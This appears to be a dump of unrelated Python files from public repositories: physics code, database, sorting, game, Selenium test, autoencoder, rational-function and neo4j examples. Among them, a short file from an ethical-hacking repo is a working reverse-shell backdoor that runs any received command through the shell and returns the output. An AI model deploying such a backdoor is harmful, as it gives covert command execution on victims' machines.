x,y,z: Position in the plasma (float)
Returns:
epsR: The plasma di-electric tensor at the given point (3x3 Matrix)
"""
#Get the magnetic field
Bx,By,Bz=Bfield(x,y,z)
#Get the relevant angles for matrix rotation later
Bmag=Bnorm(x,y,z)
theta=np.arccos(Bz/Bmag)
phi=np.pi/2
if Bx!=0:
phi=np.arctan(By/Bx)
#Get the density of the plasma
ne=densityConst(x,y,z)
#Get the collisionality of the plasma
nu_e=collisionality(x,y,z)
#If the density is too low, the tensor can just be the identity matrix
if ne < 1e5:
epsR=np.array([[1,0,0],[0,1,0],[0,0,1]])
#MFEM uses column major for matrix
return np.conj(epsR)
#Calcuate the relevant frequencies
Pi_he=np.sqrt(ne*q_p**2/(eps_0*4*m_amu)) #Helium plasma frequency
Pi_e=np.sqrt(ne*q_e**2/(eps_0*m_e)) #Electron plasma frequency
Omega_he=q_p*Bmag/(4*m_amu) #Helium cyclotron frequency
Omega_e=q_e*Bmag/(m_e) #Electron cyclotron frequency
#Calculate R,L and P
R=1-((Pi_e**2/w**2)*(w/(w+Omega_e)))-((Pi_he**2/w**2)*(w/(w+Omega_he))) #Right-hand polarized wave
L=1-((Pi_e**2/w**2)*(w/(w-Omega_e)))-((Pi_he**2/w**2)*(w/(w-Omega_he))) #Left-hand polarized wave
P=1-(Pi_e**2/(w*(w-1j*nu_e)))-(Pi_he**2/w**2) #Unmagnetized plasma
#Calculate S and D
S=(R+L)/2
D=(R-L)/2
#Construct the di-electric tensor elements
e_xx=S
e_xy=-1j*D
e_xz=0
e_yx=1j*D
e_yy=S
e_yz=0
e_zx=0
e_zy=0
e_zz=P
#Construct the eps_r matrix in the local frame
epsRLoc=np.array([[e_xx,e_xy,e_xz],[e_yx,e_yy,e_yz],[e_zx,e_zy,e_zz]])
#Construct the rotation matrices
#Phi
phiMat=np.array([[np.cos(phi),np.sin(phi),0],[-np.sin(phi),np.cos(phi),0],[0,0,1]])
#Theta
thetaMat=np.array([[np.cos(theta),0,-np.sin(theta)],[0,1,0],[np.sin(theta),0,np.cos(theta)]])
#Apply the rotation matrices
#Apply the phi rotation matrix
temp=np.matmul(phiMat,epsRLoc)
epsRtemp=np.matmul(temp,np.linalg.inv(phiMat))
#Apply the theta rotation matrix
temp=np.matmul(thetaMat,epsRtemp)
epsR=np.matmul(temp,np.linalg.inv(thetaMat))
#MFEM uses column major for matrix
return np.conj(epsR)
#Plot S_r as a function of z
z=np.arange(-12,12.1,0.1)
SArr=[]
for zVal in z:
SArr.append(PML(zVal,'z'))
plt.plot(z,np.imag(SArr),label='Imaginary')
plt.plot(z,np.real(SArr),label='Real')
plt.legend()
plt.grid(True)
plt.show() | true |
ff10a3f310074cbc47ad8fba13e899ce4e04c11f | Python | abdjiber/prototype-distance-securitaire | /web app/src/db.py | UTF-8 | 4,323 | 2.9375 | 3 | [] | no_license | from mysql.connector import connect
from mysql.connector.errors import InterfaceError
from src.user import USER
from src.position import Position
class DB():
"""Database class for managing Create Read Update Delete Insert operations."""
def __init__(self, host, db_name, table_name, user_name, user_pwd):
"""Database class contructor."""
self.host = host
self.db_name = db_name
self.table_name = table_name
self.user_name = user_name
self.user_pwd = user_pwd
self.cursor = None
def connect(self):
"""Database connector fonction.
Doesn't work. Connection is lost when setting it to the classe attribute cursor.
"""
conn = connect(host=self.host,
user=self.user_name,
passwd=self.user_pwd,
database=self.db_name)
cursor = conn.cursor(dictionary=True)
self.cursor = cursor
def insert_user_into_db(self, user):
conn = connect(host=self.host,
user=self.user_name,
passwd=self.user_pwd,
database=self.db_name)
cursor = conn.cursor(dictionary=True)
sql = f"INSERT INTO {self.db_name}.{self.table_name}(id, city, latitude, \
longitude) VALUES(%s, %s, %s, %s)"
vals = (
user.id,
user.city,
str(user.position.lat),
str(user.position.lng),
)
cursor.execute(sql, vals)
conn.commit()
cursor.close()
conn.close()
def delete_from_db(self, id_):
"""Delete a user from the database."""
conn = connect(host=self.host,
user=self.user_name,
passwd=self.user_pwd,
database=self.db_name)
cursor = conn.cursor(dictionary=True)
sql = f"DELETE FROM {self.db_name}.{self.table_name} WHERE id=%s"
vals = (id_, )
cursor.execute(sql, vals)
conn.commit()
cursor.close()
conn.close()
def update_position(self, user):
"""Update user information into the database"""
conn = connect(host=self.host,
user=self.user_name,
passwd=self.user_pwd,
database=self.db_name)
cursor = conn.cursor(dictionary=True)
sql = (f"UPDATE {self.db_name}.{self.table_name} set latitude=%s,"
"longitude=%s WHERE id=%s")
vals = (
user.position.lat,
user.position.lng,
user.id,
)
cursor.execute(sql, vals)
conn.commit()
cursor.close()
conn.close()
def get_user_by_id(self, id_):
"""Get a user from the database by his ID"""
conn = connect(host=self.host,
user=self.user_name,
passwd=self.user_pwd,
database=self.db_name)
cursor = conn.cursor(dictionary=True)
sql = f"SELECT * FROM {self.db_name}.{self.table_name} WHERE id=%s"
vals = (id_, )
cursor.execute(sql, vals)
try:
res = cursor.fetchall()[0]
except InterfaceError as err: # SI AUCUNE DONNEE N EST RETOURNE
res = []
cursor.close()
conn.close()
user = USER(city=res['city'],
min_distance=res['min_distance'],
position=Position(lat=res['latitude'],
lng=res['longitude']))
user.setId(res['id'])
return user
def get_users_same_city(self, city):
"""Get the users form the same city in the database"""
conn = connect(host=self.host,
user=self.user_name,
passwd=self.user_pwd,
database=self.db_name)
cursor = conn.cursor(dictionary=True)
sql = f"SELECT * FROM {self.db_name}.{self.table_name} WHERE city=%s"
vals = (city, )
cursor.execute(sql, vals)
try:
users_same_city = cursor.fetchall()
except InterfaceError as err: # SI AUCUNE DONNEE N EST RETOURNE
users_same_city = []
cursor.close()
conn.close()
return users_same_city
| true |
0b7ffb177cfecbb6638f73d0c6ec4f3b712d9e40 | Python | thinkingjxj/Python | /mark/装饰器/sort.py | UTF-8 | 701 | 3.53125 | 4 | [] | no_license | __author__ = 'thinking'
#sorted()
# def sort(iterable, reverse = False):
#new = []
#for x in iterable:
# new.append(x)
# return new
lst = [1,7,4,7,3,9,8]
def sort(iterable):
new = []
for x in iterable:
for i,y in enumerate(new):
if x > y:
new.insert(i,x)
break
else:
new.append(x)
return new
print(sort(lst))
def sort(iterable, reverse = False):
new = []
for x in iterable:
for i,y in enumerate(new):
flag = x > y if reverse else x < y
if flag:
new.insert(i,x)
else:
new.append(x)
return new
print(sort(lst)) | true |
e817f09dca70e4bfda8201d655d1bc44636f9866 | Python | JoJaJones/GessGame | /Piece.py | UTF-8 | 3,698 | 3.359375 | 3 | [] | no_license | from Board import Board
# noinspection PyMethodMayBeStatic
class Piece:
def __init__(self, pos: tuple, color: str, board: Board):
self._pos = pos
self._board = board
self._color = color
self._stones = {}
self._num_stones = 0
self._center_stone = False
self._max_move = 0
self.load_stones()
self._is_valid = True
def get_pos(self):
return self._pos
def load_stones(self):
row, col = self._pos
for i in range(-1, 2):
for j in range(-1, 2):
stone = self._board.get_piece_at_pos((row + i, col + j))
if stone:
if stone.get_color() == self._color:
self._num_stones += 1
if i == 0 and j == 0:
self._center_stone = True
self._max_move = 20
self._stones[(i, j)] = stone
else:
self._is_valid = False
return
if not self._center_stone:
self._max_move = 3
def is_ring(self):
return self._num_stones == 8 and not self._center_stone
def get_members_at_edge(self, direction: tuple):
stones = []
c_shift, r_shift = direction
row, col = direction
c_shift = abs(c_shift)
r_shift = abs(r_shift)
for i in range(-1, 2):
stones.append((row + r_shift * i, col + c_shift * i))
return stones
def check_move(self, dest):
e_row, e_col = dest
s_row, s_col = self._pos
direction = self._board.get_direction(self._pos, dest)
if direction is None:
return False
stones = []
if direction[0]:
stones += self.get_members_at_edge((direction[0], 0))
if direction[1]:
stones += self.get_members_at_edge((0, direction[1]))
if (direction[0], direction[1]) not in self._stones:
return False
if max(abs(e_row - s_row), abs(e_col - s_col)) > self._max_move:
return False
stones = set(stones)
for stone_pos in stones:
r_shift, c_shift = stone_pos
s_start = s_row + r_shift, s_col + c_shift
s_end = e_row + r_shift, e_col + c_shift
if stone_pos in self._stones and not self._stones[stone_pos].check_move(s_end):
return False
elif not self._board.is_unobstructed(s_start, s_end):
return False
return True
def perform_move(self, dest: tuple):
self.update_board(dest)
def update_board(self, dest):
stone_positions = self.get_stone_pos().union(self.get_stone_pos(dest))
row, col = dest
for pos in stone_positions:
stone = self._board.get_piece_at_pos(pos)
if stone:
stone.update_pos()
for stone_pos in self._stones:
r_shift, c_shift = stone_pos
stone = self._stones[stone_pos]
stone.update_pos((row + r_shift, col + c_shift))
def get_stone_pos(self, pos = None):
stones = []
if pos:
row, col = pos
else:
row, col = self._pos
for i in range(-1,2):
for j in range(-1,2):
stones.append((row + i, col + j))
stones = set(stones)
return stones
def is_valid(self):
if self._is_valid:
if self._num_stones > 1:
return True
if self._num_stones == 1 and not self._center_stone:
return True
return False
| true |
2b5ed985dad52c9dfaf8d79c0ea40f05888312e9 | Python | leoli1/RischAlgorithm | /src/RationalFunction.py | UTF-8 | 14,648 | 2.90625 | 3 | [] | no_license | '''
Created on 22.09.2018
@author: Leonard
'''
from __future__ import division
import FieldExtension as FE
import Polynomial as Pol
from Utils import *
import Number
class RationalFunction(object):
def __init__(self, numerator, denominator):
self.__derivative = None
self.__logDerivative = None
self.numerator = numerator
self.denominator = denominator
while type(self.numerator) is RationalFunction or type(self.denominator) is RationalFunction:
if type(self.numerator)==RationalFunction:
tempNum = self.numerator
self.numerator = self.numerator.numerator
self.denominator = self.denominator*tempNum.denominator
if type(self.denominator)==RationalFunction:
tempDenom = self.denominator
self.numerator = self.numerator*self.denominator.denominator
self.denominator = tempDenom.numerator
if isNumber(self.numerator):
if isNumber(denominator):
self.denominator = Pol.Polynomial([self.denominator])
self.numerator = Pol.Polynomial([self.numerator],variable=self.denominator.variable)#fieldTower=self.denominator.fieldTower)
elif isNumber(self.denominator):
self.denominator = Pol.Polynomial([self.denominator],variable=self.numerator.variable)#fieldTower = self.numerator.fieldTower)
numFieldTower = self.numerator.getFieldTower()
denomFieldTower = self.denominator.getFieldTower()
if numFieldTower!=denomFieldTower:
if numFieldTower.isExtendedTowerOf(denomFieldTower):
self.denominator = Pol.Polynomial([self.denominator],variable=self.numerator.variable)#fieldTower=numFieldTower)
elif denomFieldTower.isExtendedTowerOf(numFieldTower):
self.numerator = Pol.Polynomial([self.numerator],variable=self.denominator.variable)#fieldTower=denomFieldTower)
else:
raise Exception()
#self.fieldTower = self.numerator.fieldTower
self.variable = self.numerator.variable
self.removeCommonFactors()
if self.denominator.isConstant():
self.numerator = self.numerator/self.denominator.getConstant()
self.denominator = Pol.Polynomial([1],variable=self.variable)
elif self.denominator.deg0():
self.numerator = self.numerator/self.denominator
self.denominator = Pol.Polynomial([Number.ONE],variable=self.variable)
self.makeDenominatorMonicInPlace()
@property
def fieldTower(self):
return self.variable.fieldExtension.fieldTower
def isConstant(self):
if isNumber(self.numerator):
return numberIsZero(self.numerator) or isNumber(self.denominator) or self.denominator.isConstant()
if self.numerator.isConstant():
return numberIsZero(self.numerator.getConstant()) or isNumber(self.denominator) or self.denominator.isConstant()
return False
def getConstant(self):
if not self.isConstant():
return None
if isNumber(self.numerator):
if numberIsZero(self.numerator):
return 0
if isNumber(self.denominator):
return self.numerator/self.denominator
else:
return self.numerator/self.denominator.getConstant()
else:
if self.numerator.isZero():
return 0
if isNumber(self.denominator):
return self.numerator.getConstant()/self.denominator
else:
return self.numerator.getConstant()/self.denominator.getConstant()
def isZero(self):
return objEqualsNumber(self.getConstant(),Number.ZERO)
# ========================================== Field Tower/Extension =========================================
def getFieldTower(self):
return self.fieldTower
def getFieldExtension(self):
return self.getFieldTower().getLastExtension()
def removeCommonFactors(self):
"""
cancels common factors, so that: numerator/denominator = p/q with gcd(p,q)=1
"""
gcd = Pol.PolyGCD(self.numerator, self.denominator)
if not gcd==1:
self.numerator = Pol.PolyDiv(self.numerator, gcd)[0]
self.denominator = Pol.PolyDiv(self.denominator,gcd)[0]
def reduceToFieldTower(self, targetFieldTower):
if isNumber(self.numerator):
newNum = Pol.Polynomial([self.numerator],variable=targetFieldTower.getLastVariable())
else:
newNum = self.numerator.reduceToFieldTower(targetFieldTower)
if isNumber(self.denominator):
newDenom = Pol.Polynomial([self.denominator],variable=targetFieldTower.getLastVariable())
else:
newDenom = self.denominator.reduceToFieldTower(targetFieldTower)
if newNum==None or newDenom==None:
return None
return RationalFunction(newNum,newDenom)#newNum/newDenom#RationalFunction(newNum,newDenom,fieldTower=targetFieldTower)
def reduceToLowestPossibleFieldTower(self):
if self.fieldTower.towerHeight==1:
return self
r = self.reduceToFieldTower(self.fieldTower.prevTower())
if r==None:
return self
else:
return r.reduceToLowestPossibleFieldTower()
def isLowestFieldTower(self):
r = self.reduceToFieldTower(self.fieldTower.prevTower())
return r==None
# ========================================== Differentiate stuff =========================================
def differentiate(self):
p = self.numerator
q = self.denominator
if isNumber(p):
dp = 0
else:
dp = p.differentiate()
if isNumber(q):
dq = 0
else:
dq = q.differentiate()
num = dp*q+(-1)*p*dq
denom = q*q
self.__derivative = RationalFunction(num,denom)
return self.__derivative# (p/q)' = (p'q-pq')/(q^2)
def logDifferentiate(self):
if id(self.__logDerivative)!=id(None):
return self.__logDerivative
self.__logDerivative = self.differentiate()/self
return self.__logDerivative
# ========================================== Arithmetic stuff =========================================
def updateCoefficientsAll(self):
self.numerator.updateCoefficientsAll()
self.denominator.updateCoefficientsAll()
def Inverse(self):
return RationalFunction(self.denominator,self.numerator)
def makeDenominatorMonic(self):
if isNumber(self.denominator):
return
lcoeff = self.denominator.getLeadingCoefficient()
lcoeff_poly = Pol.Polynomial(coefficients=[lcoeff],variable=self.variable)
if isNumber(self.numerator):
newNumerator = Pol.Polynomial([self.numerator],variable=self.variable)/lcoeff_poly
else:
newNumerator = self.numerator/lcoeff_poly
newDenominator = self.denominator/lcoeff_poly
return RationalFunction(newNumerator,newDenominator)
def makeDenominatorMonicInPlace(self):
if isNumber(self.denominator):
return
lcoeff = self.denominator.getLeadingCoefficient()
lcoeff_poly = Pol.Polynomial(coefficients=[lcoeff],variable=self.variable)
if isNumber(self.numerator):
self.numerator = Pol.Polynomial([self.numerator],variable=self.variable)/lcoeff_poly
else:
self.numerator = self.numerator/lcoeff_poly
self.denominator = self.denominator/lcoeff_poly
def asPolynomial(self):
self.numerator.simplifyCoefficients()
self.denominator.simplifyCoefficients()
c = self.denominator.getConstant()
if c==None:
denom = self.denominator.reduceToLowestPossibleFieldTower()
if denom.fieldTower.towerHeight<self.numerator.fieldTower.towerHeight:
return self.numerator/denom
(q,r) = Pol.PolyDiv(self.numerator, self.denominator)
if r==0:
return q
return None
return self.numerator*(1/c)
def simplified(self):
num = self.numerator.simplified()
denom = self.denominator.simplified()
return RationalFunction(num,denom)
def BasicPartialFraction(self, denomFactorization):
return Pol.PartialFractionWithPowerFactorization(self.numerator, denomFactorization)
def replaceNumbersWithRationals(self):
if not isNumber(self.numerator):
self.numerator.replaceNumbersWithRationals()
if not isNumber(self.denominator):
self.denominator.replaceNumbersWithRationals()
def completeEvaluate(self, val):
return self.numerator.completeEvaluate(val)/self.denominator.completeEvaluate(val)
def __radd__(self, other):
return self.__add__(other)
def __add__(self, other):
#if other==0:
# return self
if isNumber(other):
if other==0:
return self
return self.__add__(Pol.Polynomial([other],variable=self.variable))
if other.isZero():
return self
if type(other)==Pol.Polynomial or isPoly(other):
return self.__add__(other.asRational())
num = self.numerator*other.denominator+self.denominator*other.numerator
den = self.denominator*other.denominator
return RationalFunction(num,den)
def __sub__(self, other):
return self.__add__((-1)*other)
def __rmul__(self, other):
return self.__mul__(other)
def __mul__(self, other):
#if other==1:
# return self
#if other==0:
# return 0
if isNumber(other):
if other==0:
return 0
elif other==1:
return self
return RationalFunction(self.numerator*other,self.denominator)
if type(other)==Pol.Polynomial or isPoly(other):
return self.__mul__(other.asRational())
num = self.numerator*other.numerator
den = self.denominator*other.denominator
return RationalFunction(num,den)
def __neg__(self):
return (-1)*self
def __rtruediv__(self, other):
return self.Inverse()*other
def __truediv__(self, other):
if isNumber(other):
return self.__mul__(1/other)
if isPoly(other):
return self.__truediv__(other.asRational())
newNum = self.numerator*other.denominator
newDenom = self.denominator*other.numerator
return RationalFunction(newNum,newDenom)
def isConstantMultipleOf(self, other):
c = (self/other).getConstant()
return False if c==None else c
def __eq__(self, other):
if other==None:
return False
return (self+(-1)*other).isZero()
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return self.__str__()
# ========================================== String output =========================================
def __str__(self):
out = ""
if not isNumber(self.numerator) and not self.numerator.isConstant() and self.denominator!=1:
out = "["+str(self.numerator)+"]"
elif isNumber(self.numerator):
out = str(self.numerator)
elif self.denominator==1:
out = str(self.numerator)
else:
out = str(self.numerator.getLeadingCoefficient())
if self.numerator==0:
return "0"
d = str(self.denominator)
if self.denominator==1:
return out
return out+"/["+d+"]"
def __repr__(self):
return self.__str__()
def strCustomVar(self, variable):
out = "["+str(self.numerator.strCustomVar(variable))+"]"
if self.numerator==0:
return out
d = str(self.denominator.strCustomVar(variable))
if d=="(1)":
return out
return out+"/["+d+"]"
def printFull(self):
out = ""
if not isNumber(self.numerator) and not self.numerator.isConstant() and self.denominator!=1:
out = "["+self.numerator.printFull()+"]"
elif isNumber(self.numerator):
out = str(self.numerator)
elif self.denominator==1 or (not isNumber(self.denominator) and objEqualsNumber(self.denominator.getConstant(),1)):
out = self.numerator.printFull()
else:# => self.numerator.isConstant() = True
out = self.numerator.printFull()
if self.numerator==0:
return "0"
if isNumber(self.denominator):
d = str(self.denominator)
else:
d = self.denominator.printFull()
if self.denominator==1:
return out
if len(d)==1:
return out + "/"+d
return out+"/["+d+"]"
if __name__=='__main__':
pass
"""FE.fieldTower = FE.FieldTower()
polA = Pol.Polynomial(coefficients=[1,2,1])
polB = Pol.Polynomial(coefficients=[2,1])
ratA = RationalFunction(polA,polB)
print(ratA)
polC = Pol.Polynomial(coefficients=[-1,0,1])
polD = Pol.Polynomial(coefficients=[1,1])
ratB = RationalFunction(polC,polD)
print(ratB)
fieldExtension1 = FE.FieldExtension(FE.TRANS_EXP,Pol.Polynomial([0,1]),"T_1") # field extension with e^x=exp(x)
fieldExtension2 = FE.FieldExtension(FE.TRANS_EXP,Pol.Polynomial([0,1],field=1),"T_2") # field extension with exp(exp(x))
FE.fieldTower = FE.FieldTower(fieldExtensions=[fieldExtension1,fieldExtension2])
polE = Pol.Polynomial(coefficients=[polA,polC],field=1)
polF = Pol.Polynomial(coefficients=[polB,polD],field=1)
ratC = RationalFunction(polE,polF,field=1)
print(ratC)
ratC.MakeDenominatorMonic()
print(ratC)
print("[{}]'={}".format(ratA,ratA.differentiate()))
polE = Pol.Polynomial(coefficients=[])
polA = Pol.Polynomial([4])
polB = Pol.Polynomial([3])
ratA = RationalFunction(polA,polB)
print(ratA)
x = Pol.Polynomial([0,1])
polA = Pol.Polynomial([0,x],field=1)
polB = Pol.Polynomial([0,polA],field=2)
polC = Pol.Polynomial([polA],field=2)
print(polB,polC)
print(polB/polC)
print(polB.getCoefficients())""" | true |
b2518db55f1e23c7185e841286781dd7311f14bf | Python | AsjmSitd/Selenium_pytest_course_p | /test_main_page.py | UTF-8 | 1,606 | 2.59375 | 3 | [] | no_license | import pytest
from .pages.main_page import MainPage
from .pages.base_page import BasePage
from .pages.login_page import LoginPage
from .pages.basket_page import BasketPage
from .pages.product_page import ProductPage
@pytest.mark.login_guest
class TestLoginFromMainPage():
def test_guest_can_go_to_login_page(self, browser):
link = "http://selenium1py.pythonanywhere.com/"
page = BasePage(browser, link) # инициализируем Page Object, передаем в конструктор экземпляр драйвера и url адрес
page.open() # открываем страницу
page.go_to_login_page() # выполняем метод страницы — переходим на страницу логина
def test_guest_should_see_login_link(self, browser):
link = "http://selenium1py.pythonanywhere.com/"
page = BasePage(browser, link)
page.open()
page.should_be_login_link()
def test_guest_cant_see_product_in_basket_opened_from_main_page(browser):
link = "http://selenium1py.pythonanywhere.com/"
page = BasePage(browser, link)
page.open()
bp = BasketPage(browser, link)
bp.go_to_basket()
bp.should_not_present()
bp.should_be_msg()
def test_guest_can_go_to_login_page(browser):
link = "http://selenium1py.pythonanywhere.com"
page = MainPage(browser, link)
page.open()
page.go_to_login_page()
login_page = LoginPage(browser, browser.current_url)
login_page.should_be_login_page()
| true |
d5537590e1b21f6061e33992fda4fd198a88cafb | Python | fernandopersan/4EscolaBigData | /code_GPU_local/AutoEncoder.py | UTF-8 | 4,060 | 2.8125 | 3 | [] | no_license | import os
import numpy as np
from PIL import Image
from keras.models import Model
from keras.layers import Input, Conv2D, MaxPooling2D, Flatten, Reshape, UpSampling2D, Conv2DTranspose
from keras.models import load_model
from keras.datasets import cifar10
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
#--------------------------------------------------------------------------------------------------------------------------------------------------------------
def loadingImages():
print("\tLoading CIFAR10 images ...")
(Xtrain, Ytrain), (Xtest, Ytest) = cifar10.load_data()
Xtrain, Ytrain = lowSampleDataset(Xtrain, Ytrain)
Xtest, Ytest = lowSampleDataset(Xtest, Ytest)
print('\t\tTraining set shape: ', Xtrain.shape)
print('\t\tTesting set shape: ', Xtest.shape)
return Xtrain/255, Ytrain, Xtest/255, Ytest
def lowSampleDataset(X, Y):
perm = np.random.permutation(X.shape[0])
X = X[perm[0 : (int)(X.shape[0] * (5/100))]]
Y = Y[perm[0 : (int)(Y.shape[0] * (5/100))]]
return X, Y
def definingAutoEncoder():
print("\tDefining the AE ...")
input_img = Input(shape=(32, 32, 3,))
encoder = Conv2D(8, kernel_size=(3,3), strides=(2, 2), padding='same', activation='relu')(input_img)
encoder = Conv2D(8, kernel_size=(3,3), padding='valid', activation='relu')(encoder)
encoder = MaxPooling2D(pool_size=(2, 2))(encoder)
encoder = Flatten(name='code')(encoder)
decoder = Reshape((7,7,8))(encoder)
decoder = UpSampling2D((2,2))(decoder)
decoder = Conv2DTranspose(8, kernel_size=(3,3), padding='valid', activation='relu')(decoder)
decoder = Conv2DTranspose(3, kernel_size=(3,3), strides=(2, 2), padding='same', activation='relu')(decoder)
autoencoder = Model(input_img, decoder)
autoencoder.compile(loss='mean_squared_error', optimizer='adam')
autoencoder.summary()
return autoencoder
def trainingAE(Xtrain, autoencoder, batchSize, numberEpochs):
if not (os.path.exists("_FineTuning/")):
os.makedirs("_FineTuning/")
print("\tTraining the AE ...")
historyAE = autoencoder.fit(x=Xtrain, y=Xtrain, batch_size=batchSize, epochs=numberEpochs, shuffle=True, verbose=1)
autoencoder.save_weights('_FineTuning/ae_weights.h5')
autoencoder.save('_FineTuning/ae_model.h5')
print("\tPloting the training performance ...")
plt.plot(historyAE.history['loss'])
plt.ylabel('Loss')
plt.legend(['AE'], loc='upper right')
plt.savefig("_FineTuning/ae_training.png")
plt.close()
def featureExtractionCNN(Xtrain, Xtest):
print("\tFeature extraction with AutoEncoder ...")
ae = load_model('_FineTuning/ae_model.h5')
ae.load_weights('_FineTuning/ae_weights.h5')
ae = Model(inputs=ae.input, outputs=ae.get_layer(name='code').output)
prediction = np.array(ae.predict(Xtrain))
Xtrain = np.reshape(prediction, (prediction.shape[0], prediction.shape[1]))
prediction = np.array(ae.predict(Xtest))
Xtest = np.reshape(prediction, (prediction.shape[0], prediction.shape[1]))
print('\t\tFeatures training shape: ', Xtrain.shape)
print('\t\tFeatures testing shape: ', Xtest.shape)
return Xtrain, Xtest
def classificationSVM(Xtrain, Ytrain, Xtest, Ytest):
print("\tClassification with Linear SVM ...")
svm = SVC(kernel='linear')
svm.fit(Xtrain, np.ravel(Ytrain, order='C'))
result = svm.predict(Xtest)
acc = accuracy_score(result, np.ravel(Ytest, order='C'))
print("\t\tAccuracy Linear SVM: %0.4f" % acc)
#--------------------------------------------------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
batchSize = 32
numberEpochs = 10
Xtrain, Ytrain, Xtest, Ytest = loadingImages()
autoencoder = definingAutoEncoder()
trainingAE(Xtrain, autoencoder, batchSize, numberEpochs)
Xtrain, Xtest = featureExtractionCNN(Xtrain, Xtest)
classificationSVM(Xtrain, Ytrain, Xtest, Ytest) | true |
4f518f6050081ba888c30a1fb6b7a3142f87d5eb | Python | C-BOE86/Python-Ethical-Hacking-Tools | /15 listener_and_backdoor/reverse_backdoor_1.py | UTF-8 | 442 | 2.859375 | 3 | [] | no_license | #!/usr/bin/python
import socket
import subprocess
def execute_system_commmand(command):
return subprocess.check_output(command,shell=True)
connection=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connection.connect(("localhost",1234))
#connection.send("[+]Connection Estabilshed.\n")
while True:
command = connection.recv(1024)
command_result = execute_system_commmand(command)
connection.send(command_result)
connection.close() | true |
cc894a59f747ecdb155886ad3af84dc56ad2b49e | Python | AnhVuH/VuHongAnh_Labs_c4e16 | /Lab03/homework/sum.py | UTF-8 | 50 | 2.859375 | 3 | [] | no_license | def sum(a,b):
print(a + b)
sum(3,4)
sum(2,9)
| true |
698e3908aa29dbdd772fe4fa15bbd771bc8ff740 | Python | namanjh/HandwrittenDigitTensor | /train.py | UTF-8 | 2,718 | 3.3125 | 3 | [] | no_license | use the ImageDataGenerator class to stop overfitting..
#use the flow_from_directory method to classify the images automatically...
from keras.preprocessing.image import ImageDataGenerator
train_datagen = ImageDataGenerator(rescale = 1./255, shear_range = 0.2, zoom_range = 0.2, horizontal_flip = True)
test_datagen = ImageDataGenerator(rescale = 1./255)
training_set = train_datagen.flow_from_directory('trainingSet', target_size = (28,28), batch_size = 32, class_mode = "categorical")
testing_set = test_datagen.flow_from_directory('testSet', target_size = (28,28), batch_size = 32, class_mode = "categorical")
#----------------------------------------------------------------------------------------------------
#part 1 --- Building the convolutional neural network
from keras.models import Sequential #used in initialization
from keras.layers import Conv2D #used for first step, convolution layer, to make images into 2D array
from keras.layers import MaxPooling2D #used for pooling layers
from keras.layers import Flatten #convert pool feature map into vector
from keras.layers import Dense #used to add fully connected layer
from keras.layers import Dropout
import tensorflow as tf
#initializing the neural network
classifier = Sequential()
#convolutional layer-- changing the image using the feature map
classifier.add(Conv2D(28,kernel_size = (3,3), input_shape = (28,28,1), activation = 'relu'))
#max pooling-- reducing the size of the image matrix while keeping the features intact
classifier.add(MaxPooling2D(pool_size = (2,2)))
#convolutional layer-- changing the image using the feature map
classifier.add(Conv2D(28,kernel_size = (3,3), input_shape = (28,28,1), activation = 'relu'))
#max pooling-- reducing the size of the image matrix while keeping the features intact
classifier.add(MaxPooling2D(pool_size = (2,2)))
#flattening-- changing matrix into vector as input layer
classifier.add(Flatten())
#full-connection layer--creating an ANN(also called hidden layer)
classifier.add(Dense(128, activation = tf.nn.relu))
classifier.add(Dropout(0.2))
#output-layer
classifier.add(Dense(10,activation = "softmax"))
#compiling the CNN
classifier.compile(optimizer = "adam", loss = "categorical_crossentropy", metrics = ["accuracy"])
#-----------------------------------------------------------------------------------------------
#Part 2 -- Fitting the CNN to the images
classifier.fit_generator(training_set, samples_per_epoch =41000, nb_epoch = 25, validation_data = testing_set, nb_val_samples = 1030)
#------------------------------------------------------------------------------------------------
#part 3 --- saving the model
classifier.save("my_new_model.h5")
| true |
5e9e400b8ae35332033a34273c5c0412275b3929 | Python | UWPCE-PythonCert-ClassRepos/SP_Online_Course2_2018 | /students/jeanruggiero/class08/nosql-assignment/src/neo4j_assignment.py | UTF-8 | 3,947 | 3.5625 | 4 | [] | no_license | """
neo4j example
"""
import utilities
import login_database
import utilities
log = utilities.configure_logger('default', '../logs/neo4j_assignment.log')
def add_people():
people = [
('Bob', 'Jones'),
('Nancy', 'Cooper'),
('Alice', 'Cooper'),
('Fred', 'Barnes'),
('Mary', 'Evans'),
('Marie', 'Curie'),
('Sally', 'Ride'),
('John', 'Glenn'),
('Neil', 'Armstrong')]
colors = ['red', 'blue', 'green', 'orange', 'yellow']
log.info('Step 1: First, clear the entire database, so we can start over')
log.info("Running clear_all")
driver = login_database.login_neo4j_cloud()
with driver.session() as session:
session.run("MATCH (n) DETACH DELETE n")
log.info("Step 2: Add a few people and colors.")
with driver.session() as session:
log.info('Adding a few Person nodes')
log.info('The cyph language is analagous to sql for neo4j')
for first, last in people:
cyph = "CREATE (n:Person {first_name:'%s', last_name: '%s'})" % (
first, last)
session.run(cyph)
log.info('Adding a few Color nodes')
for color in colors:
cyph = "CREATE (n:Color {color: '%s'})" % (color)
session.run(cyph)
log.info("Step 3: Get all of people in the DB:")
cyph = """MATCH (p:Person)
RETURN p.first_name as first_name, p.last_name as last_name
"""
result = session.run(cyph)
print("People in database:")
for record in result:
print(record['first_name'], record['last_name'])
log.info('Step 4: Create some favorite color relationships.')
log.info("Bob Jones likes red, orange, and yellow")
for color in ['red', 'orange', 'yellow']:
cyph = """
MATCH (p1:Person {first_name:'Bob', last_name:'Jones'})
CREATE (p1)-[favorite_color:FAVORITE_COLOR]->(c1:Color {color:'%s'})
RETURN p1
""" % color
session.run(cyph)
log.info("Sally likes green.")
cyph = """
MATCH (p1:Person {first_name:'Sally', last_name:'Ride'})
CREATE (p1)-[favorite_color:FAVORITE_COLOR]->(c1:Color {color:'green'})
RETURN p1
"""
session.run(cyph)
log.info("Neil likes blue.")
cyph = """
MATCH (p1:Person {first_name:'Neil', last_name:'Armstrong'})
CREATE (p1)-[favorite_color:FAVORITE_COLOR]->(c1:Color {color:'blue'})
RETURN p1
"""
session.run(cyph)
log.info("Alice likes blue.")
cyph = """
MATCH (p1:Person {first_name:'Alice', last_name:'Cooper'})
CREATE (p1)-[favorite_color:FAVORITE_COLOR]->(c1:Color {color:'blue'})
RETURN p1
"""
session.run(cyph)
log.info('Step 5: print the people who have each color as their favorite.')
for color in colors:
cyph = """
MATCH(c1 {color:'%s'})
-[:FAVORITE_COLOR]-(people)
RETURN people
""" % color
result = session.run(cyph)
